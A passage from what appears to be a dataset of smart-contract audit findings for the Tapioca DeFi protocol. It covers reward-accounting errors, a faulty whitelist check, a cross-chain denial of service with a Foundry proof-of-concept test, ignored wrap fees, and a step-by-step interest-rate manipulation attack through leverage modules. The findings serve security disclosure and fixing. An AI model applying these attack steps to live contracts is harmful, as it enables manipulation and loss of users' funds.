computeTotalDebt(); \\n \\n //add Origins debt \\n //Origins market doesn't accrue in time but increases totalSupply\\n //and needs to be taken into account here\\n uint256 len = allOriginsMarkets.length;\\n for (uint256 i; i < len; i++) {\\n IMarket market = IMarket(allOriginsMarkets[i]);\\n if (isOriginRegistered[address(market)]) {\\n (uint256 elastic,) = market.totalBorrow();\\n totalUsdoDebt += elastic;\\n }\\n }\\n \\n //debt should always be > USDO supply\\n if (totalUsdoDebt > usdoSupply) { \\n uint256 _amount = totalUsdoDebt - usdoSupply;\\n\\n //mint against the open interest; supply should be fully minted now\\n IUsdo(address(usdoToken)).mint(address(this), _amount);\\n\\n //send it to twTap\\n uint256 rewardTokenId = ITwTap(twTap).rewardTokenIndex(address(usdoToken));\\n _distributeOnTwTap(_amount, rewardTokenId, address(usdoToken), ITwTap(twTap));\\n }\\n } \\n }\\n```\\n\\nThis approach has two main issues that make the current reward distribution malfunction:\\nBecause debt is not actually tracked and is instead directly queried from the current total borrows via `computeTotalDebt()`, if users repay their debt prior to a reward distribution this debt won't be considered for the fees, given that fees will always be calculated considering the current `totalUsdoDebt` and `usdoSupply`.\\nBridging USDO is not considered\\nIf USDO is bridged from another chain to the current chain, then the `usdoToken.totalSupply()` will increment but the `totalUsdoDebt()` won't. This will make rewards never be distributed because `usdoSupply` will always be greater than `totalUsdoDebt`.\\nOn the other hand, if USDO is bridged from the current chain to another chain, the `usdoToken.totalSupply()` will decrement and tokens will be burnt, while `totalUsdoDebt()` will remain the same. 
This will make more rewards than the expected ones to be distributed because `usdoSupply` will be way smaller than `totalUsdoDebt`.\\nConsider the following scenario: 1000 USDO are borrowed, and already 50 USDO have been accrued as debt.\\nThis makes USDO's totalSupply() to be 1000, while `totalUsdoDebt` be 1050 USDO. If `mintOpenInterestDebt()` is called, 50 USDO should be minted and distributed among twTap holders.\\nHowever, prior to executing `mintOpenInterestDebt()`, a user bridges 100 USDO from chain B, making the total supply increment from 1000 USDO to 1100 USDO. Now, totalSupply() is 1100 USDO, while `totalUsdoDebt` is still 1050, making rewards not be distributed among users because `totalUsdoDebt` < usdoSupply.","One of the possible fixes for this issue is to track debt with a storage variable. Every time a repay is performed, the difference between elastic and base could be accrued to the variable, and such variable could be decremented when the fees distributions are performed. This makes it easier to compute the actual rewards and mitigates the cross-chain issue.","Medium. 
The fees to be distributed in twTap are likely to always be wrong, making one of the core governance functionalities (locking TAP in order to participate in Tapioca's governance) be broken given that fee distributions (and thus the incentives to participate in governance) won't be correct.","```\\nfunction mintOpenInterestDebt(address twTap) external onlyOwner { \\n uint256 usdoSupply = usdoToken.totalSupply();\\n\\n // nothing to mint when there's no activity\\n if (usdoSupply > 0) { \\n // re-compute latest debt\\n uint256 totalUsdoDebt = computeTotalDebt(); \\n \\n //add Origins debt \\n //Origins market doesn't accrue in time but increases totalSupply\\n //and needs to be taken into account here\\n uint256 len = allOriginsMarkets.length;\\n for (uint256 i; i < len; i++) {\\n IMarket market = IMarket(allOriginsMarkets[i]);\\n if (isOriginRegistered[address(market)]) {\\n (uint256 elastic,) = market.totalBorrow();\\n totalUsdoDebt += elastic;\\n }\\n }\\n \\n //debt should always be > USDO supply\\n if (totalUsdoDebt > usdoSupply) { \\n uint256 _amount = totalUsdoDebt - usdoSupply;\\n\\n //mint against the open interest; supply should be fully minted now\\n IUsdo(address(usdoToken)).mint(address(this), _amount);\\n\\n //send it to twTap\\n uint256 rewardTokenId = ITwTap(twTap).rewardTokenIndex(address(usdoToken));\\n _distributeOnTwTap(_amount, rewardTokenId, address(usdoToken), ITwTap(twTap));\\n }\\n } \\n }\\n```\\n" +USDO's MSG_TAP_EXERCISE compose messages where exercised options must be withdrawn to another chain will always fail due to wrongly requiring sendParam's to address to be whitelisted in the Cluster,medium,"Wrongly checking for the sendParam's `to` address `to` be whitelisted when bridging exercised options will make such calls always fail.\\nOne of the compose messages allowed in USDO is `MSG_TAP_EXERCISE`. 
This type of message will trigger UsdoOptionReceiverModule's `exerciseOptionsReceiver()` function, which allows users to exercise their options and obtain the corresponding exercised tapOFTs.\\nUsers can choose to obtain their tapOFTs in the chain where `exerciseOptionsReceiver()` is being executed, or they can choose to send a message to a destination chain of their choice. If users decide to bridge the exercised option, the `lzSendParams` fields contained in the `ExerciseOptionsMsg` struct decoded from the `_data` passed as parameter in `exerciseOptionsReceiver()` should be filled with the corresponding data to perform the cross-chain call.\\nThe problem is that the `exerciseOptionsReceiver()` performs an unnecessary validation that requires the `to` parameter inside the `lzSendParams` `to` be whitelisted in the protocol's cluster:\\n```\\n// UsdoOptionReceiverModule.sol\\n\\nfunction exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n // Decode received message.\\n ExerciseOptionsMsg memory msg_ = UsdoMsgCodec.decodeExerciseOptionsMsg(_data);\\n \\n _checkWhitelistStatus(msg_.optionsData.target);\\n _checkWhitelistStatus(OFTMsgCodec.bytes32ToAddress(msg_.lzSendParams.sendParam.to)); // <---- This validation is wrong \\n // rest of code\\n \\n \\n }\\n```\\n\\n`msg_.lzSendParams.sendParam.to` corresponds to the address that will obtain the tokens in the destination chain after bridging the exercised option, which can and should actually be any address that the user exercising the option decides, so this address shouldn't be required to be whitelisted in the protocol's Cluster (given that the Cluster only whitelists certain protocol-related addresses such as contracts or special addresses).\\nBecause of this, transactions where users try to bridge the exercised options will always fail because the `msg_.lzSendParams.sendParam.to` address specified by users will never be whitelisted in the Cluster.","Remove the whitelist check 
against the `msg_.lzSendParams.sendParam.to` param in exerciseOptionsReceiver():\\n```\\n// UsdoOptionReceiverModule.sol\\n\\nfunction exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n // Decode received message.\\n ExerciseOptionsMsg memory msg_ = UsdoMsgCodec.decodeExerciseOptionsMsg(_data);\\n \\n _checkWhitelistStatus(msg_.optionsData.target);\\n// Remove the line below\\n _checkWhitelistStatus(OFTMsgCodec.bytes32ToAddress(msg_.lzSendParams.sendParam.to)); \\n // rest of code\\n \\n \\n }\\n```\\n","High. The functionality of exercising options and bridging them in the same transaction is one of the wide range of core functionalities that should be completely functional in Tapioca. However, this functionality will always fail due to the mentioned issue, forcing users to only be able to exercise options in the same chain.","```\\n// UsdoOptionReceiverModule.sol\\n\\nfunction exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n // Decode received message.\\n ExerciseOptionsMsg memory msg_ = UsdoMsgCodec.decodeExerciseOptionsMsg(_data);\\n \\n _checkWhitelistStatus(msg_.optionsData.target);\\n _checkWhitelistStatus(OFTMsgCodec.bytes32ToAddress(msg_.lzSendParams.sendParam.to)); // <---- This validation is wrong \\n // rest of code\\n \\n \\n }\\n```\\n" +"Withdrawing to other chain when exercising options won't work as expected, leading to DoS",medium,"Withdrawing to another chain when exercising options will always fail because the implemented functionality does not bridge the tokens exercised in the option, and tries to perform a regular cross-chain call instead.\\nTapioca incorporates a DAO Share Options (DSO) program where users can lock USDO in order to obtain TAP tokens at a discounted price.\\nIn order to exercise their options, users need to execute a compose call with a message type of `MSG_TAP_EXERCISE`, which will trigger the UsdoOptionReceiverModule's `exerciseOptionsReceiver()` 
function.\\nWhen exercising their options, users can decide to bridge the obtained TAP tokens into another chain by setting the `msg_.withdrawOnOtherChain` to true:\\n```\\n// UsdoOptionReceiverModule.sol\\n\\nfunction exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n \\n // rest of code \\n \\n ITapiocaOptionBroker(_options.target).exerciseOption(\\n _options.oTAPTokenID,\\n address(this), //payment token \\n _options.tapAmount \\n ); \\n \\n // rest of code\\n \\n address tapOft = ITapiocaOptionBroker(_options.target).tapOFT();\\n if (msg_.withdrawOnOtherChain) {\\n // rest of code \\n\\n // Sends to source and preserve source `msg.sender` (`from` in this case).\\n _sendPacket(msg_.lzSendParams, msg_.composeMsg, _options.from); \\n\\n // Refund extra amounts\\n if (_options.tapAmount - amountToSend > 0) {\\n IERC20(tapOft).safeTransfer(_options.from, _options.tapAmount - amountToSend);\\n }\\n } else {\\n //send on this chain\\n IERC20(tapOft).safeTransfer(_options.from, _options.tapAmount);\\n }\\n }\\n } \\n```\\n\\nAs the code snippet shows, `exerciseOptionsReceiver()` will perform mainly 2 steps:\\nExercise the option by calling `_options.target.exerciseOption()` . This will make USDO tokens serving as a payment for the `tapOft` tokens be transferred from the user, and in exchange the corresponding option `tapOft` tokens will be transferred to the USDO contract so that they can later be transferred to the user.\\nTAP tokens will be sent to the user. 
This can be done in two ways:\\nIf the user doesn't decide to bridge them (by leaving `msg_.withdrawOnOtherChain` as false), the `tapOft` tokens will simply be transferred to the `_options.from` address, succesfully exercising the option\\nOn the other hand, if the user decides to bridge the exercised option, the internal `_sendPacket()` function will be triggered, which will perform a call via LayerZero to the destination chain:\\n`// UsdoOptionReceiverModule.sol\\n\\nfunction _sendPacket(LZSendParam memory _lzSendParam, bytes memory _composeMsg, address _srcChainSender)\\n private\\n returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt)\\n {\\n /// @dev Applies the token transfers regarding this send() operation.\\n // - amountDebitedLD is the amount in local decimals that was ACTUALLY debited from the sender.\\n // - amountToCreditLD is the amount in local decimals that will be credited to the recipient on the remote OFT instance.\\n (uint256 amountDebitedLD, uint256 amountToCreditLD) =\\n _debit(_lzSendParam.sendParam.amountLD, _lzSendParam.sendParam.minAmountLD, _lzSendParam.sendParam.dstEid);\\n \\n /// @dev Builds the options and OFT message to quote in the endpoint.\\n (bytes memory message, bytes memory options) = _buildOFTMsgAndOptionsMemory(\\n _lzSendParam.sendParam, _lzSendParam.extraOptions, _composeMsg, amountToCreditLD, _srcChainSender\\n );\\n \\n /// @dev Sends the message to the LayerZero endpoint and returns the LayerZero msg receipt.\\n msgReceipt =\\n _lzSend(_lzSendParam.sendParam.dstEid, message, options, _lzSendParam.fee, _lzSendParam.refundAddress);\\n /// @dev Formulate the OFT receipt.\\n oftReceipt = OFTReceipt(amountDebitedLD, amountToCreditLD);\\n\\n emit OFTSent(msgReceipt.guid, _lzSendParam.sendParam.dstEid, msg.sender, amountDebitedLD);\\n }`\\nThe problem with the approach followed when users want to bridge the exercised options is that the contract will not actually bridge the exercised `tapOft` tokens by 
calling the tapOft's `sendPacket()` function (which is the actual way by which the token can be transferred cross-chain). Instead, the contract calls `_sendPacket()` , a function that will try to perform a USDO cross-chain call (instead of a `tapOft` cross-chain call). This will make the `_debit()` function inside `_sendPacket()` be executed, which will try to burn USDO tokens from the msg.sender:\\n```\\n// OFT.sol \\n\\nfunction _debit(\\n uint256 _amountLD, \\n uint256 _minAmountLD,\\n uint32 _dstEid\\n ) internal virtual override returns (uint256 amountSentLD, uint256 amountReceivedLD) {\\n (amountSentLD, amountReceivedLD) = _debitView(_amountLD, _minAmountLD, _dstEid);\\n \\n // @dev In NON-default OFT, amountSentLD could be 100, with a 10% fee, the amountReceivedLD amount is 90,\\n // therefore amountSentLD CAN differ from amountReceivedLD.\\n \\n // @dev Default OFT burns on src.\\n _burn(msg.sender, amountSentLD);\\n }\\n```\\n\\nThis leads to two possible outcomes:\\n`msg.sender` (the LayerZero endpoint) has enough `amountSentLD` of USDO tokens to be burnt. In this situation, USDO tokens will be incorrectly burnt from the user, leading to a loss of balance for him. After this, the burnt USDO tokens will be bridged. This outcome greatly affect the user in two ways:\\nUSDO tokens are incorrectly burnt from his balance\\nThe exercised `tapOft` tokens remain stuck forever in the USDO contract because they are never actually bridged\\nThe most probable: `msg.sender` (LayerZero endpoint) does not have enough `amountSentLD` of USDO tokens to be burnt. In this case, an error will be thrown and the whole call will revert, leading to a DoS\\nProof of Concept\\nThe following poc shows how the function will be DoS'ed due to the sender not having enough USDO to be burnt. 
In order to execute the Poc, perform the following steps:\\nRemove the `_checkWhitelistStatus(OFTMsgCodec.bytes32ToAddress(msg_.lzSendParams.sendParam.to));` line in UsdoOptionReceiverModule.sol's `exerciseOptionsReceiver()` function (it is wrong and related to another vulnerability)\\nPaste the following code in Tapioca-bar/test/Usdo.t.sol:\\n`// Usdo.t.sol\\n\\nfunction testVuln_exercise_option() public {\\n uint256 erc20Amount_ = 1 ether;\\n\\n //setup\\n {\\n deal(address(aUsdo), address(this), erc20Amount_);\\n\\n // @dev send TAP to tOB\\n deal(address(tapOFT), address(tOB), erc20Amount_);\\n\\n // @dev set `paymentTokenAmount` on `tOB`\\n tOB.setPaymentTokenAmount(erc20Amount_);\\n }\\n \\n //useful in case of withdraw after borrow\\n LZSendParam memory withdrawLzSendParam_;\\n MessagingFee memory withdrawMsgFee_; // Will be used as value for the composed msg\\n\\n {\\n // @dev `withdrawMsgFee_` is to be airdropped on dst to pay for the send to source operation (B->A).\\n PrepareLzCallReturn memory prepareLzCallReturn1_ = usdoHelper.prepareLzCall( // B->A data\\n IUsdo(address(bUsdo)),\\n PrepareLzCallData({\\n dstEid: aEid,\\n recipient: OFTMsgCodec.addressToBytes32(address(this)),\\n amountToSendLD: erc20Amount_,\\n minAmountToCreditLD: erc20Amount_,\\n msgType: SEND,\\n composeMsgData: ComposeMsgData({\\n index: 0,\\n gas: 0,\\n value: 0,\\n data: bytes(""""),\\n prevData: bytes(""""),\\n prevOptionsData: bytes("""")\\n }),\\n lzReceiveGas: 500_000,\\n lzReceiveValue: 0\\n })\\n );\\n withdrawLzSendParam_ = prepareLzCallReturn1_.lzSendParam;\\n withdrawMsgFee_ = prepareLzCallReturn1_.msgFee;\\n }\\n\\n /**\\n * Actions\\n */\\n uint256 tokenAmountSD = usdoHelper.toSD(erc20Amount_, aUsdo.decimalConversionRate());\\n\\n //approve magnetar\\n ExerciseOptionsMsg memory exerciseMsg = ExerciseOptionsMsg({\\n optionsData: IExerciseOptionsData({\\n from: address(this),\\n target: address(tOB), \\n paymentTokenAmount: tokenAmountSD,\\n oTAPTokenID: 0, // @dev 
ignored in TapiocaOptionsBrokerMock\\n tapAmount: tokenAmountSD\\n }),\\n withdrawOnOtherChain: true,\\n lzSendParams: LZSendParam({\\n sendParam: SendParam({\\n dstEid: 0,\\n to: ""0x"",\\n amountLD: erc20Amount_,\\n minAmountLD: erc20Amount_,\\n extraOptions: ""0x"",\\n composeMsg: ""0x"",\\n oftCmd: ""0x""\\n }),\\n fee: MessagingFee({nativeFee: 0, lzTokenFee: 0}),\\n extraOptions: ""0x"",\\n refundAddress: address(this)\\n }),\\n composeMsg: ""0x""\\n });\\n bytes memory sendMsg_ = usdoHelper.buildExerciseOptionMsg(exerciseMsg);\\n\\n PrepareLzCallReturn memory prepareLzCallReturn2_ = usdoHelper.prepareLzCall(\\n IUsdo(address(aUsdo)),\\n PrepareLzCallData({\\n dstEid: bEid,\\n recipient: OFTMsgCodec.addressToBytes32(address(this)),\\n amountToSendLD: erc20Amount_,\\n minAmountToCreditLD: erc20Amount_,\\n msgType: PT_TAP_EXERCISE,\\n composeMsgData: ComposeMsgData({\\n index: 0,\\n gas: 500_000,\\n value: uint128(withdrawMsgFee_.nativeFee),\\n data: sendMsg_,\\n prevData: bytes(""""),\\n prevOptionsData: bytes("""")\\n }),\\n lzReceiveGas: 500_000,\\n lzReceiveValue: 0\\n })\\n );\\n bytes memory composeMsg_ = prepareLzCallReturn2_.composeMsg;\\n bytes memory oftMsgOptions_ = prepareLzCallReturn2_.oftMsgOptions;\\n MessagingFee memory msgFee_ = prepareLzCallReturn2_.msgFee;\\n LZSendParam memory lzSendParam_ = prepareLzCallReturn2_.lzSendParam;\\n\\n (MessagingReceipt memory msgReceipt_,) = aUsdo.sendPacket{value: msgFee_.nativeFee}(lzSendParam_, composeMsg_);\\n\\n {\\n verifyPackets(uint32(bEid), address(bUsdo));\\n\\n vm.expectRevert(""ERC20: burn amount exceeds balance"");\\n this.lzCompose(\\n bEid,\\n address(bUsdo),\\n oftMsgOptions_,\\n msgReceipt_.guid,\\n address(bUsdo),\\n abi.encodePacked(\\n OFTMsgCodec.addressToBytes32(address(this)), composeMsg_\\n )\\n ); \\n\\n }\\n\\n }`\\nRun the poc with the following command, inside the Tapioca-bar repo: `forge test --mt testVuln_exercise_option`\\nWe can see how the ""ERC20: burn amount exceeds balance"" 
error is thrown due to the issue mentioned in the report.","If users decide to bridge their exercised tapOft, the sendPacket() function incorporated in the tapOft contract should be used instead of UsdoOptionReceiverModule's internal _sendPacket() function, so that the actual bridged asset is the tapOft and not the USDO.","High. As demonstrated, two critical outcomes might affect the user:\\n`tapOft` funds will remain stuck forever in the USDO contract and USDO will be incorrectly burnt from `msg.sender`\\nThe core functionality of exercising and bridging options always reverts and effectively causes a DoS.","```\\n// UsdoOptionReceiverModule.sol\\n\\nfunction exerciseOptionsReceiver(address srcChainSender, bytes memory _data) public payable {\\n \\n // rest of code \\n \\n ITapiocaOptionBroker(_options.target).exerciseOption(\\n _options.oTAPTokenID,\\n address(this), //payment token \\n _options.tapAmount \\n ); \\n \\n // rest of code\\n \\n address tapOft = ITapiocaOptionBroker(_options.target).tapOFT();\\n if (msg_.withdrawOnOtherChain) {\\n // rest of code \\n\\n // Sends to source and preserve source `msg.sender` (`from` in this case).\\n _sendPacket(msg_.lzSendParams, msg_.composeMsg, _options.from); \\n\\n // Refund extra amounts\\n if (_options.tapAmount - amountToSend > 0) {\\n IERC20(tapOft).safeTransfer(_options.from, _options.tapAmount - amountToSend);\\n }\\n } else {\\n //send on this chain\\n IERC20(tapOft).safeTransfer(_options.from, _options.tapAmount);\\n }\\n }\\n } \\n```\\n" +Not considering fees when wrapping mtOFTs leads to DoS in leverage executors,medium,"When wrapping mtOFTs in leverage executors, fees are not considered, making calls always revert because the obtained assets amount is always smaller than expected.\\nTapioca will allow tOFTs and mtOFTs to act as collateral in some of Tapioca's markets, as described by the documentation. 
Although regular tOFTs don't hardcode fees to 0, meta-tOFTs (mtOFTs) could incur a fee when wrapping, as shown in the following code snippet, where `_checkAndExtractFees()` is used to calculate a fee considering the wrapped _amount:\\n```\\n// mTOFT.sol\\n\\nfunction wrap(address _fromAddress, address _toAddress, uint256 _amount)\\n external\\n payable \\n whenNotPaused\\n nonReentrant\\n returns (uint256 minted)\\n {\\n // rest of code\\n \\n uint256 feeAmount = _checkAndExtractFees(_amount);\\n if (erc20 == address(0)) {\\n _wrapNative(_toAddress, _amount, feeAmount);\\n } else { \\n if (msg.value > 0) revert mTOFT_NotNative();\\n _wrap(_fromAddress, _toAddress, _amount, feeAmount);\\n }\\n\\n return _amount - feeAmount;\\n } \\n```\\n\\nWhen fees are applied, the amount of `mtOFTs` minted to the caller won't be the full `_amount`, but the `_amount - feeAmount`.\\nTapioca's leverage executors are required to wrap/unwrap assets when tOFTs are used as collateral in order to properly perform their logic. The problem is that leverage executors don't consider the fact that if collateral is an `mtOFT`, then a fee could be applied.\\nLet's consider the `BaseLeverageExecutor` contract (which has the `_swapAndTransferToSender()` function, called by all leverage executors):\\n```\\n// BaseLeverageExecutor.sol\\n\\nfunction _swapAndTransferToSender( \\n bool sendBack, \\n address tokenIn,\\n address tokenOut,\\n uint256 amountIn, \\n bytes memory data\\n ) internal returns (uint256 amountOut) {\\n SLeverageSwapData memory swapData = abi.decode(data, (SLeverageSwapData)); \\n \\n // rest of code\\n \\n // If the tokenOut is a tOFT, wrap it. Handles ETH and ERC20.\\n // If `sendBack` is true, wrap the `amountOut to` the sender. 
else, wrap it to this contract.\\n if (swapData.toftInfo.isTokenOutToft) { \\n _handleToftWrapToSender(sendBack, tokenOut, amountOut);\\n } else if (sendBack == true) {\\n // If the token wasn't sent by the wrap OP, send it as a transfer.\\n IERC20(tokenOut).safeTransfer(msg.sender, amountOut);\\n } \\n } \\n```\\n\\nAs we can see in the code snippet, if the user requires to wrap the obtained swapped assets by setting `swapData.toftInfo.isTokenOutToft` to `true`, then the internal `_handleToftWrapToSender()` function will be called. This function will wrap the tOFT (or mtOFT) and send it to `msg.sender` or `address(this)`, depending on the user's `sendBack` input:\\n```\\n// BaseLeverageExecutor.sol\\n\\nfunction _handleToftWrapToSender(bool sendBack, address tokenOut, uint256 amountOut) internal {\\n address toftErc20 = ITOFT(tokenOut).erc20();\\n address wrapsTo = sendBack == true ? msg.sender : address(this);\\n\\n if (toftErc20 == address(0)) {\\n // If the tOFT is for ETH, withdraw from WETH and wrap it.\\n weth.withdraw(amountOut);\\n ITOFT(tokenOut).wrap{value: amountOut}(address(this), wrapsTo, amountOut);\\n } else {\\n // If the tOFT is for an ERC20, wrap it.\\n toftErc20.safeApprove(tokenOut, amountOut);\\n ITOFT(tokenOut).wrap(address(this), wrapsTo, amountOut);\\n toftErc20.safeApprove(tokenOut, 0);\\n }\\n }\\n```\\n\\nThe problem here is that if `tokenOut` is an mtOFT, then a fee might be applied when wrapping. 
However, this function does not consider the `wrap()` function return value (which as shown in the first code snippet in this report, will return the actual minted amount, which is always `_amount - feeAmount` ).\\nThis leads to a vulnerability where contracts performing these wraps will believe they have more funds than intended, leading to a Denial of Service and making the leverage executors never work with mtOFTs.\\nLet's say a user wants to lever up by calling BBLeverage.sol's `buyCollateral()` function:\\n```\\n// BBLeverage.sol\\n\\nfunction buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data) \\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from) \\n returns (uint256 amountOut) \\n { \\n \\n\\n // rest of code\\n \\n { \\n amountOut = leverageExecutor.getCollateral( \\n collateralId, \\n address(asset),\\n address(collateral),\\n memoryData.supplyShareToAmount + memoryData.borrowShareToAmount,\\n calldata_.from,\\n calldata_.data\\n );\\n }\\n uint256 collateralShare = yieldBox.toShare(collateralId, amountOut, false);\\n address(asset).safeApprove(address(yieldBox), type(uint256).max); \\n \\n \\n yieldBox.depositAsset(collateralId, address(this), address(this), 0, collateralShare); \\n address(asset).safeApprove(address(yieldBox), 0); \\n \\n // rest of code\\n } \\n```\\n\\nAs we can see, the contract will call `leverageExecutor.getCollateral()` in order to perform the swap. Notice how the value returned by `getCollateral()` will be stored in the amountOut variable, which will later be converted to `collateralShare` and deposited into the `yieldBox`.\\nLet's say the `leverageExecutor` in this case is the `SimpleLeverageExecutor.sol` contract. 
When `getCollateral()` is called, `SimpleLeverageExecutor` will directly return the value returned by the internal `_swapAndTransferToSender()` function:\\n`// `SimpleLeverageExecutor.sol`\\n\\nfunction getCollateral( \\n address assetAddress,\\n address collateralAddress,\\n uint256 assetAmountIn,\\n bytes calldata swapperData \\n ) external payable override returns (uint256 collateralAmountOut) {\\n // Should be called only by approved SGL/BB markets.\\n if (!cluster.isWhitelisted(0, msg.sender)) revert SenderNotValid();\\n return _swapAndTransferToSender(true, assetAddress, collateralAddress, assetAmountIn, swapperData);\\n } `\\nAs seen in the report, `_swapAndTransferToSender()` won't return the amount swapped and wrapped, and will instead only return the amount obtained when swapping, assuming that wraps will always mint the same amount:\\n`// BaseLeverageExecutor.sol\\n\\nfunction _swapAndTransferToSender( \\n bool sendBack, \\n address tokenIn,\\n address tokenOut,\\n uint256 amountIn, \\n bytes memory data\\n ) internal returns (uint256 amountOut) {\\n \\n ...\\n \\n amountOut = swapper.swap(swapperData, amountIn, swapData.minAmountOut);\\n \\n ...\\n if (swapData.toftInfo.isTokenOutToft) { \\n _handleToftWrapToSender(sendBack, tokenOut, amountOut);\\n } else if (sendBack == true) {\\n // If the token wasn't sent by the wrap OP, send it as a transfer.\\n IERC20(tokenOut).safeTransfer(msg.sender, amountOut);\\n } \\n } `\\nIf the tokenOut is an mtOFT, the actual obtained amount will be smaller than the `amountOut` stored due to the fees that might be applied.\\nThis makes the `yieldBox.depositAsset()` in `BBLeverage.sol` inevitably always fail due to not having enough funds to deposit into the YieldBox effectively causing a Denial of Service","Consider the fees applied when wrapping assets by following OFT's API, and store the returned value by `wrap()`. 
For example, `_handleToftWrapToSender()` could return an integer with the actual amount obtained after wrapping:\\n```\\n// BaseLeverageExecutor.sol\\n\\nfunction _handleToftWrapToSender(bool sendBack, address tokenOut, uint256 amountOut) internal returns(uint256 _amountOut) {\\n address toftErc20 = ITOFT(tokenOut).erc20();\\n address wrapsTo = sendBack == true ? msg.sender : address(this);\\n\\n if (toftErc20 == address(0)) {\\n // If the tOFT is for ETH, withdraw from WETH and wrap it.\\n weth.withdraw(amountOut);\\n// Remove the line below\\n ITOFT(tokenOut).wrap{value: amountOut}(address(this), wrapsTo, amountOut);\\n// Add the line below\\n _amountOut = ITOFT(tokenOut).wrap{value: amountOut}(address(this), wrapsTo, amountOut);\\n } else {\\n // If the tOFT is for an ERC20, wrap it.\\n toftErc20.safeApprove(tokenOut, amountOut);\\n// Remove the line below\\n _amountOut = ITOFT(tokenOut).wrap(address(this), wrapsTo, amountOut);\\n// Add the line below\\n ITOFT(tokenOut).wrap(address(this), wrapsTo, amountOut);\\n toftErc20.safeApprove(tokenOut, 0);\\n }\\n }\\n```\\n\\nAnd this value should be the one stored in _swapAndTransferToSender()'s amountOut:\\n```\\nfunction _swapAndTransferToSender( \\n bool sendBack, \\n address tokenIn,\\n address tokenOut,\\n uint256 amountIn, \\n bytes memory data\\n ) internal returns (uint256 amountOut) {\\n SLeverageSwapData memory swapData = abi.decode(data, (SLeverageSwapData)); \\n \\n // rest of code\\n \\n // If the tokenOut is a tOFT, wrap it. Handles ETH and ERC20.\\n // If `sendBack` is true, wrap the `amountOut to` the sender. 
else, wrap it to this contract.\\n if (swapData.toftInfo.isTokenOutToft) { \\n// Remove the line below\\n _handleToftWrapToSender(sendBack, tokenOut, amountOut);\\n// Add the line below\\n amountOut = _handleToftWrapToSender(sendBack, tokenOut, amountOut);\\n } else if (sendBack == true) {\\n // If the token wasn't sent by the wrap OP, send it as a transfer.\\n IERC20(tokenOut).safeTransfer(msg.sender, amountOut);\\n } \\n } \\n```\\n",High. The core functionality of leverage won't work if the tokens are mtOFT tokens.,"```\\n// mTOFT.sol\\n\\nfunction wrap(address _fromAddress, address _toAddress, uint256 _amount)\\n external\\n payable \\n whenNotPaused\\n nonReentrant\\n returns (uint256 minted)\\n {\\n // rest of code\\n \\n uint256 feeAmount = _checkAndExtractFees(_amount);\\n if (erc20 == address(0)) {\\n _wrapNative(_toAddress, _amount, feeAmount);\\n } else { \\n if (msg.value > 0) revert mTOFT_NotNative();\\n _wrap(_fromAddress, _toAddress, _amount, feeAmount);\\n }\\n\\n return _amount - feeAmount;\\n } \\n```\\n" +Secondary Big Bang market rates can be manipulated due to not triggering penrose.reAccrueBigBangMarkets(); when leveraging,medium,"Secondary market rates can still be manipulated via leverage executors because `penrose.reAccrueBigBangMarkets()` is never called in the leverage module.\\nThe attack described in Tapioca's C4 audit 1561 issue and also described in Spearbit's audit 5.2.16 issue is still possible utilizing the leverage modules.\\nAs a summary, these attacks described a way to manipulate interest rates. As stated in Tapioca's documentation, the interest rate for non-ETH markets is computed considering the current debt in ETH markets. Rate manipulation could be performed by an attacker following these steps:\\nBorrow a huge amount in the ETH market. This step did not accrue the other markets.\\nAccrue other non-ETH markets. 
It is important to be aware of the fact that non-ETH markets base their interest calculations considering the total debt in the ETH market. After step 1, the attacker triggers an accrual on non-ETH markets which will fetch the data from the greatly increased borrow amount in the ETH market, making the non-ETH market see a huge amount of debt, thus affecting and manipulating the computation of its interest rate.\\nThe fix introduced in the C4 and Spearbit audits incorporated a new function in the Penrose contract to mitigate this issue. If the caller is the `bigBangEthMarket`, then the internal `_reAccrueMarkets()` function will be called, and market's interest rates will be accrued prior to performing any kind of borrow. Following this fix, an attacker can no longer perform step 2 of accruing the markets with a manipulated rate because accrual on secondary markets has already been triggered.\\n```\\n// Penrose.sol\\n\\nfunction reAccrueBigBangMarkets() external notPaused {\\n if (msg.sender == bigBangEthMarket) {\\n _reAccrueMarkets(false);\\n } \\n }\\n \\n function _reAccrueMarkets(bool includeMainMarket) private {\\n uint256 len = allBigBangMarkets.length;\\n address[] memory markets = allBigBangMarkets;\\n for (uint256 i; i < len; i++) {\\n address market = markets[i];\\n if (isMarketRegistered[market]) {\\n if (includeMainMarket || market != bigBangEthMarket) {\\n IBigBang(market).accrue();\\n }\\n }\\n }\\n\\n emit ReaccruedMarkets(includeMainMarket);\\n }\\n```\\n\\nAlthough this fix is effective, the attack is still possible via Big Bang's leverage modules. Leveraging is a different way of borrowing that still affects a market's total debt. 
As we can see, the `buyCollateral()` function still performs a `_borrow()`, thus incrementing a market's debt:\\n```\\n// BBLeverage.sol\\n\\nfunction buyCollateral(address from, uint256 borrowAmount, uint256 supplyAmount, bytes calldata data) \\n external\\n optionNotPaused(PauseType.LeverageBuy)\\n solvent(from, false)\\n notSelf(from) \\n returns (uint256 amountOut) \\n { \\n // rest of code\\n\\n \\n {\\n (, uint256 borrowShare) = _borrow( \\n calldata_.from, \\n address(this), \\n calldata_.borrowAmount,\\n _computeVariableOpeningFee(calldata_.borrowAmount)\\n ); \\n (memoryData.borrowShareToAmount,) =\\n yieldBox.withdraw(assetId, address(this), address(leverageExecutor), 0, borrowShare);\\n }\\n \\n // rest of code\\n }\\n```\\n\\nBecause Penrose's `reAccrueBigBangMarkets()` function is not called when leveraging, the attack described in the C4 and Spearbit audits is still possible by utilizing leverage to increase the ETH market's total debt, and then accruing non-ETH markets so that rates are manipulated.","It is recommended to trigger Penrose's reAccrueBigBangMarkets() function when interacting with Big Bang's leverage modules, so that the issue can be fully mitigated.","Medium. 
